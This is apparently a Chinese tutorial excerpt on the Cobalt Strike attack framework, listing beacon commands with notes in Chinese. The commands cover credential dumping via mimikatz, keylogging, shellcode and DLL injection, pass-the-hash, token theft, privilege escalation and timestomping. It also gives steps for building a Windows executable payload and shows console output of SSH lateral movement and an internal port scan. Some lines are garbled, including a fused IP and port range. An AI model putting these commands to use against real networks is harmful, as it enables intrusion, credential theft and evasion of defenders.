命令 命令描述 ------- ----------- argue Spoof arguments for matching processes blockdlls Block non-Microsoft DLLs in child processes browserpivot Setup a browser pivot session bypassuac 尝试获取一个高权限的进程的权限 cancel 取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下 cd 切换目录 checkin 强制让被控端回连一次 clear 清除beacon内部的任务队列 connect Connect to a Beacon peer over TCP covertvpn 部署 Covert VPN 客户端 cp 复制当前文件到哪个目录 dcsync Extract a password hash from a DC desktop View and interact with target's desktop dllinject Inject a Reflective DLL into a process dllload Load DLL into a process with LoadLibrary() download 下载文件 downloads 列出当前正在下载的文件进程清单 drives 列出当前目标上所有硬盘驱动 elevate 尝试提升当前普通用户到特权用户 execute Execute a program on target (no output) execute-assembly Execute a local .NET program in-memory on target exit 退出当前 shell getprivs 提升当前用户令牌的权限 getsystem 尝试获取当前系统system权限 getuid 获取当前系统用户名称 hashdump 抓取当前lsass中明文密码 help 显示使用命令参数 inject Spawn a session in a specific process jobkill 关闭某个在系统后台长期运行的任务 jobs 列出当前在系统后台长期运行的任务 kerberos_ccache_use Apply kerberos ticket from cache to this session kerberos_ticket_purge Purge kerberos tickets from this session kerberos_ticket_use Apply kerberos ticket to this session keylogger Inject a keystroke logger into a process kill 关闭某个进程 link Connect to a Beacon peer over a named pipe logonpasswords Dump credentials and hashes with mimikatz ls 列出当前目录中所有文件名称 make_token Create a token to pass credentials mimikatz 运行猕猴桃工具,需要配合命令使用。 mkdir 创建一个目录文件 mode dns Use DNS A as data channel (DNS beacon only) mode dns-txt Use DNS TXT as data channel (DNS beacon only) mode dns6 Use DNS AAAA as data channel (DNS beacon only) mode http Use HTTP as data channel mv 移动某个文件到哪里路径下 net Network and host enumeration tool note 给当前目录机器起个名字,note beacon-shell portscan Scan a network for open services powerpick Execute a command via Unmanaged PowerShell powershell powershell + CMD命令: 在目标主机执行powershell命令 powershell-import 导入内存一个 powershell 脚本 ppid Set parent PID for spawned post-ex jobs ps 显示当前系统中所有进程列表 psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host psinject Execute PowerShell command in specific process pth Pass-the-hash using Mimikatz pwd 列出当前目录路径 reg Query the registry rev2self Revert to original token rm 删除某个文件或者某个文件夹 rportfwd Setup a reverse port forward run Execute a program on target (returns output) runas Execute a program as another user runasadmin Execute a program in a high-integrity context runu Execute a program under another PID screenshot Take a screenshot setenv Set an environment variable shell shell + CMD命令: 在目标主机执行CMD命令 shinject Inject shellcode into a process shspawn Spawn process and inject shellcode into it sleep 设置当前服务端与客户端之间心跳包时间频率 socks 启动 SOCKS4a 服务器用来中转流量 socks stop 关闭 SOCKS4a 服务器 spawn 生成一个新的会话 spawnas Spawn a session as another user spawnto Set executable to spawn processes into spawnu Spawn a session under another PID ssh 执行ssh命令,连接某台linux服务器 ssh-key Use SSH to spawn an SSH session on a host steal_token Steal access token from a process timestomp Apply timestamps from one file to another unlink Disconnect from parent Beacon upload 从本地上传文件到目标主机 wdigest Dump plaintext credentials with mimikatz winrm Use WinRM to spawn a session on a host wmi 使用wmi命令在目标主机上执行 Ctrl+k 清屏
Attacks → Packages → Windows Executable → set(Listener,Output,x64) → windows EXE
Windows Executable{ Listener: 选择一个已设好的监听服务 Add{ 新建一个监听服务 New Listener(name,payload,host,port) } Output: 选择一个可执行文件 { windows exe: x86/x64位可执行文件 windows server exe: x86/x64位可执行文件 windows dll(32.bit): 32位dll动态链接库 windows dll(64.bit): 64位dll动态链接库 } x64: 勾选即可生成64位文件 }
beacon> ssh 192.168.3.116:22 root 1234 [*] Tasked beacon to SSH to 192.168.3.116:22 as root [+] host called home, sent: 437307 bytes [+] host called home, sent: 34 bytes [+] established link to child session: 192.168.3.116
16、扫内网端内其它存活主机
1 2
beacon> portscan 192.168.3.0-192.168.3.2541-1024 arp 1024 [*] Tasked beacon to scan ports 1-1024 on 192.168.3.0-192.168.3.254